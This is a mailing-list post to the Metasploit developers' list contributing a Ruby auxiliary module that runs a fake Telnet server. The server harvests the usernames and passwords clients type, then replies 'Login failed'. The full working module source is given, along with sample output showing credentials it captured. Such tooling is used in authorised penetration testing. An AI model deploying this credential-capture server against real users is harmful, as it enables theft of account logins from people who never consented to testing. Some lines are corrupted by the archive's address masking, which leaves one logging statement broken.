-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hey everyone,
I've attached a new auxiliary module: server/capture/telnet. In the same
fashion as the other server/capture modules, this creates a fake telnet
service to capture authentication credentials. Far too many people still use
Telnet, my local college being a prime example of this.
At the beginning, the server sends DONT/WONT responses to the client's
WILL/WONT and DO/DONT option negotiations. Then the server sends "Welcome"
and presents a prompt for the username. After the username is obtained, WILL
ECHO is then sent for more realism (no password echoing on the client's end).
After all of the credentials are captured, it sends "Login failed" and closes
the connection.
msf > info server/capture/telnet
Name: Authentication Capture: Telnet
Version: 1
Provided by:
Kris Katterjohn <[EMAIL PROTECTED]>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 23 yes The local port to listen on.
SSL false no Use SSL
Description:
This module provides a fake Telnet service that is designed to
capture authentication credentials. DONTs and WONTs are sent to the
client for all option negotiations, except for ECHO at the time of
the password prompt since the server controls that for a bit more
realism.
And a little example output:
[*] TELNET LOGIN 192.168.10.6:60227 myusername / mypassword
[*] TELNET LOGIN 192.168.10.6:60228 myusername2 / mypassword2
Thanks,
Kris Katterjohn
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iQIVAwUBSN/M6v9K37xXYl36AQJbxQ/+KPTTW83VXqMW5vmEHCJxzHTTkl1nh87r
8Tbc778A9ZsD2Y8NnUOqhX8x52q2M/Eaqx+Ez5zipgGFqww8o6LsiLuIx/nx/O9V
SROfr+tWTFQUyB+usQX4cc4eJD5PlXf4Twqyja1LQvJTR5emkK+4YolaC80NXTBa
Mg9QAe+sXJm6oO3gkAKna1eYY9r9pG122zMYm2IoNRgA/V8Vjo65ZwBDhGHGZDaJ
xJd+TfFRH11TaPE2YAmNd38G6YBSzP4onLZqP8wztZ6fs2HcaYCl7Oh9+E0RjaAm
a4QrBIhQvTepfC7F4JGbcD5l8eSiiDEbhnmetHR25VRn0zBXO2SGoyge4eYdDJtH
sacEOAA7+l7G9986WkmRdpZmUi7sLO+p/MsCXbzZAbrp5EheQRGlqYkYVvMr56Se
OeWNbTLd0jNqgVFcPx+Lx6Lw0YW6W6EvaeujM/glPxFwKM8WP+RY5GbJoh2A+hyW
JFG/ifVYH7DapbegHHjR/IPBWO6rHMJEhLmuVakHyjtGM1PF0vup6sYO0pisikor
V4jiZgHp/WjkG6IW45I7MitPGYamJk8HTmDwqVjt1gJhZQjrfQQP1AMPl4YYlHw+
hi04Y2gx4PPWQDMf0k0AKQlSnfVkTVyz8MNuzTqcE914G08eDXdoR8Yf1PfXBDTf
74JejZneINs=
=f+M5
-----END PGP SIGNATURE-----
require 'msf/core'
module Msf
# Fake Telnet Service - Kris Katterjohn 09/28/2008
class Auxiliary::Server::Capture::Telnet < Msf::Auxiliary
include Exploit::Remote::TcpServer
include Auxiliary::Report
def initialize
super(
'Name' => 'Authentication Capture: Telnet',
'Version' => '1',
'Description' => %q{
This module provides a fake Telnet service that
is designed to capture authentication credentials.
DONTs
and WONTs are sent to the client for all option
negotiations,
except for ECHO at the time of the password prompt since
the server controls that for a bit more realism.
},
'Author' => 'Kris Katterjohn <[EMAIL
PROTECTED]>',
'License' => MSF_LICENSE,
'Actions' => [ [ 'Capture' ] ],
'PassiveActions' => [ 'Capture' ],
'DefaultAction' => 'Capture'
)
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port
to listen on.", 23 ])
], self.class)
end
def setup
super
@state = {}
end
def run
exploit()
end
def on_client_connect(c)
@state[c] = {
:name => "#{c.peerhost}:#{c.peerport}",
:ip => c.peerhost,
:port => c.peerport,
:user => nil,
:pass => nil,
:gotuser => false,
:gotpass => false,
:started => false
}
end
def on_client_data(c)
data = c.get_once
return if not data
offset = 0
if data[0] == 0xff
0.step(data.size, 3) do |x|
break if data[x] != 0xff
# Answer DONT/WONT for WILL/WONTs and DO/DONTs,
# except for echoing which we WILL control for
# the password
reply = "\xffX#{data[x + 2].chr}"
if @state[c][:pass] and data[x + 2] == 0x01
reply[1] = "\xfb"
elsif data[x + 1] == 0xfb or data[x + 1] == 0xfc
reply[1] = "\xfe"
elsif data[x + 1] == 0xfd or data[x + 1] == 0xfe
reply[1] = "\xfc"
end
c.put reply
offset += 3
end
end
if not @state[c][:started]
c.put "\r\nWelcome.\r\n\r\n"
@state[c][:started] = true
end
if @state[c][:user].nil?
c.put "\x01"
c.put "\x00Login: "
@state[c][:user] = ""
return
end
return if offset >= data.size
data = data[offset, data.size]
if not @state[c][:gotuser]
@state[c][:user] = data.strip
@state[c][:gotuser] = true
c.put "\xff\xfb\x01" # WILL ECHO
end
if @state[c][:pass].nil?
c.put "\x01"
c.put "\x00Password: "
@state[c][:pass] = ""
return
end
if not @state[c][:gotpass]
@state[c][:pass] = data.strip
@state[c][:gotpass] = true
c.put "\x00\r\n"
end
report_auth_info(
:host => @state[c][:ip],
:proto => 'telnet',
:targ_host => datastore['SRVHOST'],
:targ_port => datastore['SRVPORT'],
:user => @state[c][:user],
:pass => @state[c][:pass]
)
print_status("TELNET LOGIN [EMAIL PROTECTED]:name]} [EMAIL
PROTECTED]:user]} / [EMAIL PROTECTED]:pass]}")
c.put "\r\nLogin failed\r\n\r\n"
c.close
end
def on_client_close(c)
@state.delete(c)
end
end
end
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
